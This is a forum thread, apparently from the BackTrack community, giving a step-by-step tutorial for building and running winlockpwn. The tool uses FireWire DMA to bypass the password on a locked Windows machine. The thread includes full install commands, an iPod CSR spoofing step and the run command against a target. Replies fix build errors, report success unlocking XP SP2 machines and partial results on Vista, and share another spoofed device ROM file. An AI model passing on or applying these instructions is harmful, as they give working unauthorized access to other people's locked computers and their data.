Tutorial Winlockpwn

[jonah_15]

Adam Boileau (hxxp://wwx.storm.net.nz/projects/16) recently released source code for a tool winlockpwn that can unlock a password locked Windows machine in seconds.

Timothy Legge wrote some instructions on how to install this and get winlockpwn working on Ubuntu. I’ve used Timothy’s original document to document how to get the tool working on Backtrack 2 & Backtrack3 Beta.

Thanks

Jonah_15

Replace hxxp with http & wwx with www

Step 1

First we need to install the required libraries:

Libraw 1394 v1.3.0

hxxp://linux1394.org/dl/libraw1394-1.3.0.tar.gz
tar xvfz libraw1394-1.3.0.tar.gz
cd libraw1394-1.3.0
./configure
make
make dev
make install

Step 2

Install Swig

hxxp://downloads.sourceforge.net/swig-1.3.34.tar.gz
tar xvfz swig-1.3.34.tar.gz
cd swig-1.3.34
./configure
make
make install

Step 3

Install Python 2.3

hxxp://wwx.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvf Python-2.3.6.tar
mv Python-2.3.6 python-2.3
cd python-2.3
./configure
make
make install

This will install python in /usr/local which means you need to update each script to reference this location.

Step 4

search for and comment out the__attribute__ ((deprecated)); and be sure to put an ending semicolon on the previous line

vi /usr/local/include/libraw1394/raw1394.h

Step 5

download the software from hxxp://wwx.storm.net.nz/projects/16

hxxp://wwx.storm.net.nz/static/files...394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vi Makefile (reference /usr/local instead of /usr for python)
make

Step 6

load the module and set some permissions:

modprobe raw1394
chmod 666 /dev/raw1394

Step 7

Copy libraw1394.so.8 to to /lib:

cd /usr/local/lib/
cp libraw1394.so.8 /lib

Step 8

Plug in the firewire cable into both your backtrack system and the target windows system.

Step 9

run businfo to check the port configurations:
vi businfo (update the location of python to be /usr/local/bin/python)
./businfo

Step 10

vi romtool (update the location of python to be /usr/local/bin/python)
cp libraw1394.so.8 /lib
./romtool -s 0 ipod.csr

Step 11

vi winlockpwn (update the location of python to be /usr/local/bin/python)
./winlockpwn 0 1 3

[williamc]

Is it necessary to install python 2.3 when you already have 2.5? I ask because I'm getting an error at this step:

wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vi Makefile (reference /usr/local instead of /usr for python)
make
make: *** No rule to make target '/usr/local/include/python2.5', needed by '_raw1394.so'. Stop.

William

[theprez98]

Is it necessary to install python 2.3 when you already have 2.5? I ask because I'm getting an error at this step:

wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vi Makefile (reference /usr/local instead of /usr for python)
make
make: *** No rule to make target '/usr/local/include/python2.5', needed by '_raw1394.so'. Stop.

William

Have you considered changing the reference in the makefile to 2.5 instead of 2.3?

[williamc]

yes, the makefile references python 2.5. Any other ideas? Anyone get this to work following the tutorial?

[jonah_15]

I also had problems with Python 2.5 but had no issues with Python 2.3

[williamc]

I got it working with Python 2.5. Here are the modified steps:

Code:

cd /pythonraw1394
nano Makefile
# modify lines as follows:
_raw1394.so: raw1394_wrap.c /usr/include/python2.5
     $(CC) -Wall -shared -fPIC -I/usr/include/python2.5 -I/usr/local/include/libraw1394 raw1394_wrap.c -lraw1394 -o _raw1394.so

No other modification to the install were needed. I didnt modify businfo or winlockpwn.

I successfully wiped the password for a locked Windows XP SP2 machine! Ctrl+Alt+Del and Enter. No password needed.

Update:
After running this successfully, I am unable to run it again without restarting Backtrack. I believe the businfo retains the settings for the PC you first plug into. Any way to clear the 1394 settings (maybe take the device down?) and bring it back up in the clear?

William

[imported_johnjohnsp1]

Tested on WindowsXPSP2,SP3 and works fine just got a problem with Vista once start surf the memory just after a few sec will detect the error resource busy .. as previuos posted.

Been tested also with the Network login with XPSP2 and worked great !

[mummysboy]

ok i crossed that hurdle

now i am at the point where i have to reference /usr/local/include/python2.5 in the other scripts - but i cant see any obvious places to put the reference into

Its getting late so i will have another look again tomorrow thankyou for the 2.5 pointer

[williamc]

Vista will work for a few seconds, at which point you will get a resource busy error. As I previously requested, if anyone has a firewire device other than an Ipod, please use romtool to create a csr file.

William

[tmaletic]

Was doing some testing against filevault and finally realized I had access to another rom type. So here's attached a csr file snarfed from a powerbook g4 in case anyone can find a use for it. Unfortunately, it acts just like the ipod.csr when used to spoof the remote end of a firewire connection to Vista - at least for me. -tm